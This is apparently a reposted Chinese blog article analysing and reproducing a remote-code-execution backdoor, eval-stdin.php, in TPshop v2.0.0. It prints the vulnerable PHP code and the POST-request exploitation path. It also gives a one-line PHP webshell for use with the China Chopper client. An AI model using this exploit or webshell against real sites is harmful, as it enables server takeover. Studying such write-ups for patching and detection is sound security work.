TPshop商城 Getshell后门文件分析与复现

时间:2023年08月11日

/

来源:网络

/

编辑:佚名

影响版本:TPSHOP v2.0.0
后门文件:eval-stdin.php 内容:
<?php  eval('?>' . file_get_contents('php://input')); ?>
分析:
使用
file_get_contents('php://input'))
接收POST请求的原始数据流
eval函数来执行。
我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不:

TPshop商城 Getshell后门文件分析与复现
利用方法:
访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。

TPshop商城 Getshell后门文件分析与复现
那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接.
采用写入的话就有点麻烦了。
地址:
http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
配置:
<O><?php eval($_POST[c]);?></O>

TPshop商城 Getshell后门文件分析与复现

TPshop商城 Getshell后门文件分析与复现
猜你需要

豫ICP备2021026617号-1  豫公网安备:41172602000185   Copyright © 2021-2028 www.78moban.com/ All Rights Reserved

本站作品均来自互联网,转载目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责。如有侵犯您的版权,请联系 1565229909#qq.com(把#改成@),我们将立即处理。